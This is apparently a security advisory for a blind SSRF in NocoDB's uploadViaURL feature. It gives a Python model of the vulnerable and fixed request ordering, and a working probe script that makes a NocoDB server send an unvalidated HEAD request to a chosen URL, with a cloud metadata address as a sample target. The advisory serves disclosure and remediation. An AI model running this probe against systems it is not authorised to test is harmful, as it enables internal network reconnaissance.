NocoDB Blind Server-Side Request Forgery Vulnerability in uploadViaURL Functionality

Vulnerability

A blind Server-Side Request Forgery (SSRF) vulnerability affects NocoDB versions prior to 0.301.0. In the 'uploadViaURL' feature the server first issues a 'HEAD' request to the user-supplied URL to collect metadata, and only then downloads the file. The download stage is subject to SSRF protections, but the initial metadata request is sent without any validation, so an attacker can make the server send a 'HEAD' request to an arbitrary URL, including internal addresses that the download stage would have refused.
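The ordering problem described above, as an added illustration that is not NocoDB's code: a metadata 'HEAD' sent before the target is checked, beside the same flow with the check moved in front of every outbound request. The function names (upload_via_url_vulnerable, upload_via_url_fixed, is_safe_target) are assumptions, and the HTTP client is replaced by a recorder so the script runs offline.

```python
"""Model of the uploadViaURL ordering bug (added example, not NocoDB's code).

is_safe_target() resolves the host and rejects anything that is not a
globally routable address. The vulnerable flow sends the HEAD before that
check; the fixed flow checks once, before any request leaves the host.
"""
import ipaddress
import socket
from urllib.parse import urlsplit


class SSRFBlocked(Exception):
    """Raised when a URL points at a non-public address."""


def resolve_all(host):
    """Every address the host maps to (IP literals resolve without DNS)."""
    try:
        infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    except socket.gaierror:
        return set()
    # strip a possible IPv6 scope id such as "fe80::1%eth0"
    return {ipaddress.ip_address(i[4][0].split("%")[0]) for i in infos}


def is_safe_target(url):
    """True only for http(s) URLs whose host resolves solely to global
    addresses. Loopback, RFC 1918, link-local (including 169.254.169.254),
    multicast, reserved and unspecified ranges all fail, as do other
    schemes and hosts that do not resolve at all."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    addrs = resolve_all(parts.hostname)
    if not addrs:
        return False
    return all(a.is_global for a in addrs)


def upload_via_url_vulnerable(url, send):
    """Vulnerable ordering: the metadata HEAD goes out before any check."""
    send("HEAD", url)                 # unvalidated outbound request (the bug)
    if not is_safe_target(url):       # protection applies only from here on
        raise SSRFBlocked(url)
    return send("GET", url)


def upload_via_url_fixed(url, send):
    """Fixed ordering: validate once, before any outbound request."""
    if not is_safe_target(url):
        raise SSRFBlocked(url)
    send("HEAD", url)
    return send("GET", url)


def run(flow, url):
    """Drive a flow with a recording stand-in for the HTTP client and return
    the list of (method, url) requests that would have left the server."""
    sent = []

    def send(method, target):
        sent.append((method, target))
        return b""

    try:
        flow(url, send)
    except SSRFBlocked:
        pass
    return sent


if __name__ == "__main__":
    probe = "http://169.254.169.254/latest/meta-data/"
    print("vulnerable:", run(upload_via_url_vulnerable, probe))  # one HEAD escapes
    print("fixed:     ", run(upload_via_url_fixed, probe))       # nothing is sent
```

One caveat on the fixed flow: resolving the name in the check and letting the HTTP client resolve it again at connect time leaves a DNS rebinding window. A production version should connect to the address that was validated (or validate inside the client's connect hook) rather than re-resolve.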

Impact

Exploitation yields blind SSRF: the server sends an unfiltered outbound 'HEAD' request to an attacker-chosen URL, but the response is not returned to the attacker. The impact is therefore limited to probing internal services (reachability inferred from timing or error behaviour rather than from response content) and to interacting with sensitive internal endpoints that act on a 'HEAD' request.

Reproduction

To reproduce this vulnerability, send a POST request to the '/api/v2/storage/upload-by-url' endpoint with a JSON payload containing an attacker-controlled URL. The server issues a 'HEAD' request to that URL before any SSRF protection is applied, so a listener at the URL records the request even though the later download stage may be refused.
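A reproduction harness for the steps above, added here as an example and not part of the original advisory: a local listener that records inbound requests, plus the POST that asks a NocoDB instance to fetch a URL pointing back at that listener. A 'HEAD' arriving at the listener from the NocoDB host confirms the pre-validation request. The payload shape (a JSON list of {"url": ...} objects), the 'xc-auth' header and the 'path' query parameter are assumptions not stated on the page; adjust them to the instance under test.

```python
"""Blind SSRF probe for upload-by-url (added example, not the advisory's code).

Assumptions: request body is a JSON array of {"url", "fileName"} objects,
authentication is an xc-auth header, and ?path= names the storage path.
"""
import json
import threading
import time
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


class Recorder(BaseHTTPRequestHandler):
    """Answer every request with an empty 200 and remember what arrived."""
    seen = []  # (method, path, client_ip) for each request received

    def _record(self):
        Recorder.seen.append((self.command, self.path, self.client_address[0]))
        self.send_response(200)
        self.send_header("Content-Type", "image/png")
        self.send_header("Content-Length", "0")
        self.end_headers()

    do_HEAD = _record
    do_GET = _record

    def log_message(self, *args):  # silence the default stderr access log
        pass


def start_listener(bind="127.0.0.1", port=0, advertise=None):
    """Serve the recorder on a background thread. Returns (server, callback_url);
    advertise is the host name or IP the NocoDB server must use to reach us."""
    srv = HTTPServer((bind, port), Recorder)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    host = advertise or srv.server_address[0]
    return srv, "http://%s:%d/probe.png" % (host, srv.server_address[1])


def build_request(base_url, target_url, token, path="noco/probe"):
    """Return (url, headers, body) for the upload-by-url POST (shape assumed)."""
    url = base_url.rstrip("/") + "/api/v2/storage/upload-by-url?path=" + path
    headers = {"Content-Type": "application/json", "xc-auth": token}
    body = json.dumps([{"url": target_url, "fileName": "probe.png"}]).encode()
    return url, headers, body


def trigger(base_url, target_url, token, timeout=15):
    """Send the POST and return the HTTP status. A 4xx/5xx does not mean the
    probe failed: the HEAD may already have left before the download was refused."""
    url, headers, body = build_request(base_url, target_url, token)
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def self_check(callback_url, timeout=5):
    """HEAD our own listener and return the status; proves the recorder works
    before NocoDB is pointed at it."""
    req = urllib.request.Request(callback_url, method="HEAD")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


def heads_seen():
    """Every HEAD recorded so far, as (method, path, client_ip)."""
    return [s for s in Recorder.seen if s[0] == "HEAD"]


if __name__ == "__main__":
    import sys
    # usage: python probe.py https://nocodb.example <xc-auth token> <host NocoDB can reach>
    base, token, my_host = sys.argv[1:4]
    srv, callback = start_listener(bind="0.0.0.0", advertise=my_host)
    loopback = "http://127.0.0.1:%d/probe.png" % srv.server_address[1]
    print("callback:", callback, "self-check:", self_check(loopback))
    print("NocoDB status:", trigger(base, callback, token))
    time.sleep(3)  # the HEAD is sent early, but allow for a slow instance
    print("HEAD requests received:", heads_seen())
    srv.shutdown()
```

Point the callback at a host the NocoDB server can reach (a public listener when testing a remote instance); a recorded 'HEAD' whose client_ip is the NocoDB host, followed by an error from the download stage, is the signature of this issue. A patched instance sends nothing to a blocked target.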

Remediation

Upgrade to NocoDB version 0.301.0 or later, where this vulnerability is patched.

Added: Jan 28, 2026, 9:21 PM
Updated: Jan 28, 2026, 9:21 PM

Vulnerability Rating

Custom Algorithm
spread: 3.1
impact: 0.4
exploitability: 6.0
remediation: 7.7
relevance: 2.4
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.